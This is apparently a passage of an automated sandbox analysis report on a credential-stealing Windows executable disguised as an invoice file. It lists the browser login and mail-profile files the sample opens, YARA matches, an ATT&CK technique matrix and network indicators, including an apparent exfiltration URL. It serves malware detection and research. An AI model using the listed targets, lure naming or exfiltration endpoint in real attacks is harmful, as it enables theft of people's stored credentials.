                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Users\user\Desktop\FATURA VE BELGELER..exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.5400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2ad4668.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2d49e0c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2d47df4.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2d46ddc.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1990854679.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1988410714.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1988410714.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.5400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2ad4668.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2d49e0c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2d47df4.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.2d46ddc.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1990854679.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1988410714.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1988410714.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  111
                  Process Injection
                  1
                  Masquerading
                  1
                  OS Credential Dumping
                  1
                  Query Registry
                  Remote Services1
                  Email Collection
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  LSASS Memory1
                  Security Software Discovery
                  Remote Desktop Protocol11
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                  Virtualization/Sandbox Evasion
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin Shares1
                  Data from Local System
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection
                  NTDS31
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput Capture13
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                  Obfuscated Files or Information
                  Cached Domain Credentials1
                  System Network Configuration Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                  Software Packing
                  DCSync13
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  FATURA VE BELGELER..exe42%ReversingLabsWin32.Ransomware.Loki
                  FATURA VE BELGELER..exe56%VirustotalBrowse
                  FATURA VE BELGELER..exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  reallyfreegeoip.org2%VirustotalBrowse
                  scratchdreams.tk17%VirustotalBrowse
                  checkip.dyndns.com0%VirustotalBrowse
                  checkip.dyndns.org0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://reallyfreegeoip.org0%URL Reputationsafe
                  http://reallyfreegeoip.org0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  http://checkip.dyndns.com0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  http://tempuri.org/DataSetGen.xsd0%Avira URL Cloudsafe
                  https://scratchdreams.tk100%Avira URL Cloudmalware
                  https://reallyfreegeoip.org/xml/191.96.227.219$0%Avira URL Cloudsafe
                  https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
                  https://reallyfreegeoip.org/xml/191.96.227.2190%Avira URL Cloudsafe
                  http://scratchdreams.tk100%Avira URL Cloudmalware
                  https://scratchdreams.tk/_send_.php?TS16%VirustotalBrowse
                  http://tempuri.org/DataSetGen.xsd2%VirustotalBrowse
                  https://scratchdreams.tk18%VirustotalBrowse
                  http://scratchdreams.tk17%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  172.67.177.134
                  truefalseunknown
                  scratchdreams.tk
                  104.21.27.85
                  truefalseunknown
                  checkip.dyndns.com
                  132.226.247.73
                  truefalseunknown
                  checkip.dyndns.org
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://checkip.dyndns.org/false
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://scratchdreams.tk/_send_.php?TSfalse
                  • 16%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  https://reallyfreegeoip.org/xml/191.96.227.219false
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://tempuri.org/DataSetGen.xsdFATURA VE BELGELER..exefalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://checkip.dyndns.org/qFATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://scratchdreams.tkFATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 18%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  https://reallyfreegeoip.org/xml/191.96.227.219$FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://reallyfreegeoip.orgFATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://reallyfreegeoip.orgFATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://checkip.dyndns.orgFATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002AF3000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://checkip.dyndns.comFATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://scratchdreams.tkFATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 17%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    https://reallyfreegeoip.org/xml/FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.177.134
                    reallyfreegeoip.orgUnited States
                    13335CLOUDFLARENETUSfalse
                    104.21.27.85
                    scratchdreams.tkUnited States
                    13335CLOUDFLARENETUSfalse
                    132.226.247.73
                    checkip.dyndns.comUnited States
                    16989UTMEMUSfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1435996
                    Start date and time:2024-05-03 15:18:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 21s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:FATURA VE BELGELER..exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 145
                    • Number of non-executed functions: 16
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    TimeTypeDescription
                    15:18:51API Interceptor8302041x Sleep call for process: FATURA VE BELGELER..exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    172.67.177.134Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                      Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                        DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                          Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                            BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                              gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                                PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                  Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                      Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                        104.21.27.85https://community.dailisi.com/?FO5Oec=sku_number_=567pqr&gn=4*tywizt*_gd*Pn3Pb8RGL5Om.*gd_0GPMOJ53S1*ZGJhdGVtYW5AaGlsY29ycC5jb20Get hashmaliciousUnknownBrowse
                                          Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                            DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                  e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            132.226.247.73Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            M0uVrW4HJb.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                            • checkip.dyndns.org/
                                                            rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            sample1.exeGet hashmaliciousSeclesBot, TrojanRansomBrowse
                                                            • checkip.dyndns.org/
                                                            BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            checkip.dyndns.comHalkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            PO_287104.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 193.122.130.0
                                                            DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 193.122.130.0
                                                            PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 193.122.130.0
                                                            Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 132.226.8.169
                                                            SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                            • 193.122.130.0
                                                            SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                            • 193.122.6.168
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            scratchdreams.tkHalkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            reallyfreegeoip.orgHalkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
